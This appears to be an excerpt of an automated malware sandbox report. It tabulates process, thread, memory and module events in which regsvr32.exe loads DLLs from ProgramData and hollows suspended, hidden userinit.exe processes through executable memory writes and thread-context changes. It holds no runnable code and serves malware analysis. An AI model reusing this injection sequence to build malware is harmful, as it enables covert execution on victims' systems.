Create	C:\Windows\System32\userinit.exe	os_pid = 0x80c, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0x980, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0x9b0, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0x944, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0xaa8, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0xaa0, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0xb6c, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0xba0, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn

Thread (54)

»

Operation	Process	Additional Information	Count	Logfile
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf10	1	Fn

Memory (72)

»

Operation	Process	Additional Information	Count	Logfile
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Read	C:\Windows\System32\userinit.exe	address = 0x7ffdf008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffd8008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffda008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffdf008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffdd008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffd5008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffdb008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffd5008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffd7008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffdf008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffd8008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffdf008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffd3008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffdc008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffd6008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffdd008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffd5008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffd4008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffdf008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffd8008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffda008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffdf008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffdd008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffd5008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffdb008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffd5008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffd7008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffdf008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffd8008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffdf008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffd3008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffdc008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffd6008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffdd008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffd5008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffd4008, size = 4	1	Fn Data

Module (400)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\ProgramData\xxx6000137xx\marxvxinhhm64528113361.dll	-	1	Fn
Load	kernel32.dll	base_address = 0x75370000	7	Fn
Load	c:\programdata\tempa\marxvxinhhm98.dll	base_address = 0x8f0000	1	Fn
Load	user32.dll	base_address = 0x757b0000	2	Fn
Load	advapi32.dll	base_address = 0x76da0000	2	Fn
Load	oleaut32.dll	base_address = 0x758f0000	1	Fn
Load	version.dll	base_address = 0x745c0000	1	Fn
Load	gdi32.dll	base_address = 0x75880000	1	Fn
Get Handle	c:\windows\system32\regsvr32.exe	base_address = 0xa40000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	3	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	3	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	base_address = 0x73e90000	1	Fn
Get Filename	-	process_name = c:\windows\system32\regsvr32.exe, file_name_orig = C:\ProgramData\xxx6000137xx\marxvxinhhm64528113361.dll, size = 522	1	Fn
Get Filename	-	process_name = c:\windows\system32\regsvr32.exe, file_name_orig = C:\Windows\System32\regsvr32.exe, size = 261	5	Fn
Get Filename	c:\programdata\tempa\marxvxinhhm98.dll	process_name = c:\windows\system32\regsvr32.exe, file_name_orig = c:\programdata\tempa\marxvxinhhm98.dll, size = 522	1	Fn
Get Filename	-	process_name = c:\windows\system32\regsvr32.exe, file_name_orig = lÝ, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\regsvr32.exe, file_name_orig = C:\Windows\System32\regsvr32.exe, size = 256	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = VirtualAlloc, address_out = 0x753c2fb6	4	Fn
Get Address	c:\windows\system32\kernel32.dll	function = VirtualFree, address_out = 0x753c1da4	4	Fn
Get Address	c:\windows\system32\kernel32.dll	function = VirtualProtect, address_out = 0x753b2341	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetThreadPreferredUILanguages, address_out = 0x753b22d7	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadPreferredUILanguages, address_out = 0x753ae627	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetThreadUILanguage, address_out = 0x753aae42	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetNativeSystemInfo, address_out = 0x753abe77	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExW, address_out = 0x753ade40	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLogicalProcessorInformation, address_out = 0x753a2004	4	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	3	Fn
Get Address	c:\programdata\tempa\marxvxinhhm98.dll	function = BTMEMO, address_out = 0x9d7bf0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = DeleteCriticalSection, address_out = 0x76f79ac5	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LeaveCriticalSection, address_out = 0x76f67760	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = EnterCriticalSection, address_out = 0x76f677a0	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = InitializeCriticalSection, address_out = 0x76f7a149	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalAlloc, address_out = 0x753c3363	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersion, address_out = 0x753b154e	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThreadId, address_out = 0x753bbb80	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = InterlockedDecrement, address_out = 0x753bbbf0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = InterlockedIncrement, address_out = 0x753bbbc0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = VirtualQuery, address_out = 0x753c76d6	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = WideCharToMultiByte, address_out = 0x753c450e	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = MultiByteToWideChar, address_out = 0x753c452b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = lstrlenA, address_out = 0x753ba611	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = lstrcpynA, address_out = 0x753a8979	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LoadLibraryExA, address_out = 0x753b47fa	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetThreadLocale, address_out = 0x753b153c	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetStartupInfoA, address_out = 0x75371e10	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetProcAddress, address_out = 0x753c33d3	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetModuleHandleA, address_out = 0x753bcf41	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetModuleFileNameA, address_out = 0x753c33f6	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLocaleInfoA, address_out = 0x753aadbf	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCommandLineA, address_out = 0x753c98ff	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FreeLibrary, address_out = 0x753bd9d0	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FindFirstFileA, address_out = 0x753c2d89	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FindClose, address_out = 0x753c0e62	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = ExitProcess, address_out = 0x753c214f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = WriteFile, address_out = 0x753c1400	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x753ced38	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = RtlUnwind, address_out = 0x753a7f70	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = RaiseException, address_out = 0x753aeb60	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetStdHandle, address_out = 0x753c1e46	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetKeyboardType, address_out = 0x757fbfee	1	Fn
Get Address	c:\windows\system32\user32.dll	function = LoadStringA, address_out = 0x757b66a7	2	Fn
Get Address	c:\windows\system32\user32.dll	function = MessageBoxA, address_out = 0x7580ea11	2	Fn
Get Address	c:\windows\system32\user32.dll	function = CharNextA, address_out = 0x757bc861	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = RegQueryValueExA, address_out = 0x76db48ef	2	Fn
Get Address	c:\windows\system32\advapi32.dll	function = RegOpenKeyExA, address_out = 0x76db4907	2	Fn
Get Address	c:\windows\system32\advapi32.dll	function = RegCloseKey, address_out = 0x76db469d	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = SysFreeString, address_out = 0x758f3e59	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = SysReAllocStringLen, address_out = 0x758f7810	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = SysAllocStringLen, address_out = 0x758f45d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = TlsSetValue, address_out = 0x753bda88	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = TlsGetValue, address_out = 0x753bda70	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = TlsFree, address_out = 0x753c13b8	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = TlsAlloc, address_out = 0x753c35a1	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = lstrcpyA, address_out = 0x753b9793	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = WriteProcessMemory, address_out = 0x753ac1de	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = WaitForSingleObject, address_out = 0x753bba90	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = VirtualAllocEx, address_out = 0x753ac1b6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = TerminateProcess, address_out = 0x753b2331	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = Sleep, address_out = 0x753bba46	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SizeofResource, address_out = 0x753b3e7f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadLocale, address_out = 0x753d88e6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadContext, address_out = 0x75400193	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetFilePointer, address_out = 0x753bdb36	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetEvent, address_out = 0x753bbccc	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetErrorMode, address_out = 0x753c4a51	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetEndOfFile, address_out = 0x753b2319	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = ResumeThread, address_out = 0x753b0f1c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = ResetEvent, address_out = 0x753bbcb4	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = ReadProcessMemory, address_out = 0x753ac1ce	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = ReadFile, address_out = 0x753b96fb	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = MulDiv, address_out = 0x753bb7a0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LockResource, address_out = 0x753afd29	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LoadResource, address_out = 0x753b984d	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LoadLibraryA, address_out = 0x753c395c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalUnlock, address_out = 0x753b9d50	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalReAlloc, address_out = 0x753aec90	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalHandle, address_out = 0x753ba0c4	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalLock, address_out = 0x753b9e05	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFindAtomA, address_out = 0x753d6a4b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalDeleteAtom, address_out = 0x753af16c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAddAtomA, address_out = 0x753a83ea	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetTickCount, address_out = 0x753bba60	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetThreadContext, address_out = 0x753d0cc1	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetSystemInfo, address_out = 0x753c3728	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetStringTypeExA, address_out = 0x753a689f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLocalTime, address_out = 0x753ba90e	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetFullPathNameA, address_out = 0x753c3735	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceA, address_out = 0x753cd7d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDateFormatA, address_out = 0x753d5625	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcessId, address_out = 0x753bcac4	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCPInfo, address_out = 0x753c1e2e	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetACP, address_out = 0x753c39aa	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FreeResource, address_out = 0x753af1bd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = InterlockedExchange, address_out = 0x753bbf0a	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FormatMessageA, address_out = 0x753d8868	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FindResourceA, address_out = 0x753ba05b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FileTimeToLocalFileTime, address_out = 0x753c2004	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FileTimeToDosDateTime, address_out = 0x753b2ce1	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = EnumCalendarInfoA, address_out = 0x753d6180	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CreateThread, address_out = 0x753c375d	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CreateProcessA, address_out = 0x75372082	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CreateFileA, address_out = 0x753bcee8	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CreateEventA, address_out = 0x753b0ef7	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CompareStringA, address_out = 0x753b0f4a	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\version.dll	function = VerQueryValueA, address_out = 0x745c1b72	1	Fn
Get Address	c:\windows\system32\version.dll	function = GetFileVersionInfoSizeA, address_out = 0x745c1c9c	1	Fn
Get Address	c:\windows\system32\version.dll	function = GetFileVersionInfoA, address_out = 0x745c1ced	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = UnrealizeObject, address_out = 0x7588fb63	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = StretchBlt, address_out = 0x7588f467	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SetWindowOrgEx, address_out = 0x75888546	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SetViewportOrgEx, address_out = 0x7588834f	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SetTextColor, address_out = 0x75886906	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SetStretchBltMode, address_out = 0x75887705	1	Fn
